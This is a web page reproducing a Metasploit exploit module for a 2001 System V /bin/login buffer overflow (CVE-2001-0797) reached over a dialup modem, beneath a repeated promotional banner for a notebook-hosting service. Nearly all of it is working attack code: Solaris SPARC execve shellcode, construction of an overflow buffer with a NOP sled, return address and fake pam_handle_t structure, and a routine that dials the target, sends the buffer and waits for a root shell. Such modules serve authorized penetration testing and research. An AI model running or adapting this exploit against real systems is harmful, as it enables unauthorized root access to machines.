Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Path: blob/master/modules/exploits/solaris/dialup/manyargs.rb
Views: 18993
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Dialup9include Msf::Module::Deprecated1011moved_from 'exploit/dialup/multi/login/manyargs'1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',18'Description' => %q{19This exploit connects to a system's modem over dialup and exploits20a buffer overflow vulnerability in it's System V derived /bin/login.21The vulnerability is triggered by providing a large number of arguments.22},23'References' => [24['CVE', '2001-0797'],25['OSVDB', '690'],26['OSVDB', '691'],27['BID', '3681'],28['URL', 'https://web.archive.org/web/20120114122443/http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],29['URL', 'https://web.archive.org/web/20120114113100/http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],30['URL', 'https://github.com/0xdea/exploits/blob/master/solaris/raptor_rlogin.c'],31],32'Author' => [33'I)ruid',34],35'Arch' => ARCH_TTY,36'Platform' => ['unix'],37'License' => MSF_LICENSE,38'Payload' => {39'Space' => 3000,40'BadChars' => '',41'DisableNops' => true42},43'Targets' => [44[45'Solaris 2.6 - 8 (SPARC)',46{47'Platform' => 'unix',48'Ret' => 0x00027184,49# Solaris/SPARC special shellcode (courtesy of inode)50# execve() + exit()51'Shellcode' =>52"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" \53"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" \54"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" \55"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",56'NOP' => "\x90\x1b\x80\x0e"57}58],59],60'DefaultTarget' => 0,61'DisclosureDate' => '2001-12-12',62'Notes' => {63'Stability' => [ CRASH_SERVICE_RESTARTS ],64'SideEffects' => [ IOC_IN_LOGS ],65'Reliability' => [ REPEATABLE_SESSION ]66}67)68)69end7071def buildbuf72print_status("Targeting: #{target.name}")7374retaddr = target.ret75shellcode = target['Shellcode']76nop = target['NOP']7778# prepare the evil buffer79i = 080buf = ''8182# login name83buf[i, 4] = 'bin '84i += 48586# return address87buf[i, 4] = [retaddr].pack('N')88i += 489buf[i, 1] = ' '90i += 19192# trigger the overflow93(0...60).each do |_c|94buf[i, 2] = 'a '95i += 296end9798# padding99buf[i, 4] = ' BBB'100i += 4101102# nop sled and shellcode103(0...398).each do |_c|104buf[i, nop.size] = nop105i += nop.size106end107shellcode.each_byte do |b|108c = b.chr109case c110when '\\'111buf[i, 2] = '\\\\'112i += 2113when "\xff", "\n", ' ', "\t"114buf[i, 1] = '\\'115buf[i + 1, 1] = (((b & 0o300) >> 6) + '0').chr116buf[i + 2, 1] = (((b & 0o070) >> 3) + '0').chr117buf[i + 3, 1] = ((b & 0o007) + '0').chr118i += 4119else120buf[i, 1] = c121i += 1122end123end124125# TODO: need to overwrite/skip the last byte of shellcode?126# i -= 1127128# padding129buf[i, 4] = 'BBB '130i += 4131132# pam_handle_t: minimal header133buf[i, 16] = 'CCCCCCCCCCCCCCCC'134i += 16135buf[i, 4] = [retaddr].pack('N')136i += 4137buf[i, 4] = [0x01].pack('N')138i += 4139140# pam_handle_t: NULL padding141(0...52).each do |_c|142buf[i, 4] = [0].pack('N')143i += 4144end145146# pam_handle_t: pameptr must be the 65th ptr147buf[i, 9] = "\x00\x00\x00 AAAA\n"148i += 9149150return buf151end152153def exploit154buf = buildbuf155156print_status('Dialing Target')157if !connect_dialup158print_error('Exiting.')159return160end161162print_status('Waiting for login prompt')163164res = dialup_expect(/ogin:\s/i, 10)165# puts Rex::Text.to_hex_dump(res[:buffer])166if !(res[:match])167print_error('Login prompt not found... Exiting.')168disconnect_dialup169return170end171172# send the evil buffer, 256 chars at a time173print_status('Sending evil buffer...')174# puts Rex::Text.to_hex_dump(buf)175len = buf.length176p = 0177while (len > 0)178i = len > 0x100 ? 0x100 : len179# puts Rex::Text.to_hex_dump(buf[p,i])180dialup_puts(buf[p, i])181len -= i182p += i183# if len > 0184# puts Rex::Text.to_hex_dump("\x04")185# dialup_puts("\x04") if len > 0186# end187select(nil, nil, nil, 0.5)188end189190# wait for password prompt191print_status('Waiting for password prompt')192res = dialup_expect(/assword:/i, 30)193# puts Rex::Text.to_hex_dump(res[:buffer])194if !(res[:match])195print_error('Target is likely not vulnerable... Exiting.')196disconnect_dialup197return198end199200print_status('Password prompt received, waiting for shell')201dialup_puts("pass\n")202203res = dialup_expect(/#\s/i, 20)204# puts Rex::Text.to_hex_dump(res[:buffer])205if !(res[:match])206print_error('Shell not found.')207print_error('Target is likely not vulnerable... Exiting.')208disconnect_dialup209return210end211212print_status('Success!!!')213handler214215disconnect_dialup216end217end218219220